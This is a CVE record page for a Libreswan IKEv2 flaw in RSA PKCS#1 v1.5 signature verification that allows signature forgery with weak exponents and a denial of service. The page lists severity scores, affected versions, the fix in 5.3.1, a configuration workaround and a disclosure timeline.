CVE-2026-50722 (GCVE-0-2026-50722)
Vulnerability from cvelistv5 – Published: 2026-07-02 21:34 – Updated: 2026-07-02 21:34
VLAI
Title
IKEv2 Denial of Service via RSA-SHA1 (PKCS#1 RSASSA-PKCS1-v1_5) authentication payload
Summary
Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.
Severity
7.5 (High)
8.1 (High)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://libreswan.org/security/CVE-2026-50722/CVE… | vendor-advisory |
| https://libreswan.org/security/CVE-2026-50722/ | patch |
| https://libreswan.org/security/CVE-2026-50721/CVE… | related |
| https://www.rfc-editor.org/rfc/rfc8017 | technical-description |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| The Libreswan Project | libreswan |
Affected:
0 , ≤ 5.3
(semver)
Unaffected: 5.3.1 (semver) |
Credits
{
"containers": {
"cna": {
"affected": [
{
"collectionURL": "https://github.com/libreswan/libreswan",
"defaultStatus": "unaffected",
"packageName": "libreswan",
"product": "libreswan",
"programRoutines": [
{
"name": "RSA_authenticate_hash_signature_pkcs1_1_5_rsa"
}
],
"repo": "https://github.com/libreswan/libreswan",
"vendor": "The Libreswan Project",
"versions": [
{
"lessThanOrEqual": "5.3",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "5.3.1",
"versionType": "semver"
}
]
}
],
"configurations": [
{
"lang": "en",
"value": "Any server or client that accepts RSA-based IKEv2 connections via the default authby= settings is vulnerable to denial of service. Authentication bypass additionally requires the use of RSA keys with weak exponents (e=3). IKEv2 by default allows ECDSA, RSA-SSA-PSS, and RSA PKCS#1 1.5 as fallback due to Microsoft Windows not supporting RSASSA-PSS."
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Yeonghyeon Choi"
},
{
"lang": "en",
"type": "finder",
"value": "Duyeong Kim"
},
{
"lang": "en",
"type": "analyst",
"value": "Andrew Cagney (The Libreswan Team)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eLibreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.\u003c/p\u003e"
}
],
"value": "Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected."
}
],
"exploits": [
{
"lang": "en",
"value": "No known exploitation in the wild. The authentication bypass requires the target to use RSA keys with weak exponents (e=3), which have been disallowed by most cryptographic libraries for at least a decade. The denial-of-service attack is exploitable against any IKEv2 configuration using default authby= settings that permit RSA PKCS#1 v1.5 fallback."
}
],
"impacts": [
{
"capecId": "CAPEC-463",
"descriptions": [
{
"lang": "en",
"value": "Denial of Service via assertion failure in pluto daemon when processing malformed RSA PKCS#1 v1.5 AUTH payloads"
}
]
},
{
"capecId": "CAPEC-473",
"descriptions": [
{
"lang": "en",
"value": "Authentication bypass via Bleichenbacher-style signature forgery when weak RSA exponents (e.g., e=3) are in use"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "Weak RSA exponent (e=3) in use, enabling Bleichenbacher signature forgery"
}
]
},
{
"other": {
"content": {
"description": "Vendor-assessed severity: Medium. Authentication bypass requires weak RSA exponents (e=3) which have been disallowed by most cryptographic libraries for over a decade. DoS is mitigated by automatic daemon restart.",
"value": "MEDIUM"
},
"type": "vendorSeverity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-617",
"description": "CWE-617: Reachable Assertion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-02T21:34:41.413Z",
"orgId": "d42dc95b-23f1-4e06-9076-20753a0fb0df",
"shortName": "libreswan"
},
"references": [
{
"name": "Libreswan Security Advisory CVE-2026-50722",
"tags": [
"vendor-advisory"
],
"url": "https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt"
},
{
"name": "Libreswan CVE-2026-50722 Patches",
"tags": [
"patch"
],
"url": "https://libreswan.org/security/CVE-2026-50722/"
},
{
"name": "Related: CVE-2026-50721 (IKEv1 variant)",
"tags": [
"related"
],
"url": "https://libreswan.org/security/CVE-2026-50721/CVE-2026-50721.txt"
},
{
"name": "RFC 8017 - PKCS #1: RSA Cryptography Specifications Version 2.2",
"tags": [
"technical-description"
],
"url": "https://www.rfc-editor.org/rfc/rfc8017"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUpgrade to libreswan 5.3.1 or later. Patches for libreswan 4.15 and 5.3 are available at \u003ca href=\"https://libreswan.org/security/CVE-2026-50722/\"\u003ehttps://libreswan.org/security/CVE-2026-50722/\u003c/a\u003e\u003c/p\u003e"
}
],
"value": "Upgrade to libreswan 5.3.1 or later. Patches for libreswan 4.15 and 5.3 are available at https://libreswan.org/security/CVE-2026-50722/"
}
],
"source": {
"defects": [
"CVE-2026-50722"
],
"discovery": "EXTERNAL"
},
"taxonomyMappings": [
{
"taxonomyName": "ATT\u0026CK",
"taxonomyRelations": [
{
"relationshipName": "maps to",
"relationshipValue": "Application or System Exploitation (DoS)",
"taxonomyId": "T1499.004"
}
],
"taxonomyVersion": "15.1"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-24T00:00:00.000Z",
"value": "Libreswan notified of the issue via security@libreswan.org"
},
{
"lang": "en",
"time": "2026-06-16T00:00:00.000Z",
"value": "Advanced notice given to supported customers and distributions"
},
{
"lang": "en",
"time": "2026-06-24T00:00:00.000Z",
"value": "Public announcement and release of libreswan 5.3.1"
}
],
"title": "IKEv2 Denial of Service via RSA-SHA1 (PKCS#1 RSASSA-PKCS1-v1_5) authentication payload",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIf Windows support is not needed, configure \u003ccode\u003eauthby=ecdsa\u003c/code\u003e or \u003ccode\u003eauthby=rsa-sha2\u003c/code\u003e (or both via \u003ccode\u003eauthby=ecdsa,rsa-sha2\u003c/code\u003e) to disallow the fallback of RSA PKCS#1 1.5. The \u003ccode\u003eleftauth=\u003c/code\u003e and \u003ccode\u003erightauth=\u003c/code\u003e settings can be updated similarly if those are in use instead of \u003ccode\u003eauthby\u003c/code\u003e.\u003c/p\u003e"
}
],
"value": "If Windows support is not needed, configure authby=ecdsa or authby=rsa-sha2 (or both via authby=ecdsa,rsa-sha2) to disallow the fallback of RSA PKCS#1 1.5. The leftauth= and rightauth= settings can be updated similarly if those are in use instead of authby."
}
],
"x_generator": {
"engine": "cvelib 1.8.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "d42dc95b-23f1-4e06-9076-20753a0fb0df",
"assignerShortName": "libreswan",
"cveId": "CVE-2026-50722",
"datePublished": "2026-07-02T21:34:41.413Z",
"dateReserved": "2026-06-05T16:10:05.751Z",
"dateUpdated": "2026-07-02T21:34:41.413Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-50722\",\"sourceIdentifier\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"published\":\"2026-07-02T22:16:43.550\",\"lastModified\":\"2026-07-02T22:16:43.550\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.\"}],\"affected\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"affectedData\":[{\"vendor\":\"The Libreswan Project\",\"product\":\"libreswan\",\"defaultStatus\":\"unaffected\",\"collectionURL\":\"https://github.com/libreswan/libreswan\",\"packageName\":\"libreswan\",\"programRoutines\":[{\"name\":\"RSA_authenticate_hash_signature_pkcs1_1_5_rsa\"}],\"repo\":\"https://github.com/libreswan/libreswan\",\"versions\":[{\"version\":\"0\",\"lessThanOrEqual\":\"5.3\",\"versionType\":\"semver\",\"status\":\"affected\"},{\"version\":\"5.3.1\",\"versionType\":\"semver\",\"status\":\"unaffected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-347\"},{\"lang\":\"en\",\"value\":\"CWE-617\"}]}],\"references\":[{\"url\":\"https://libreswan.org/security/CVE-2026-50721/CVE-2026-50721.txt\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://libreswan.org/security/CVE-2026-50722/\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://www.rfc-editor.org/rfc/rfc8017\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"}]}}"
}
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…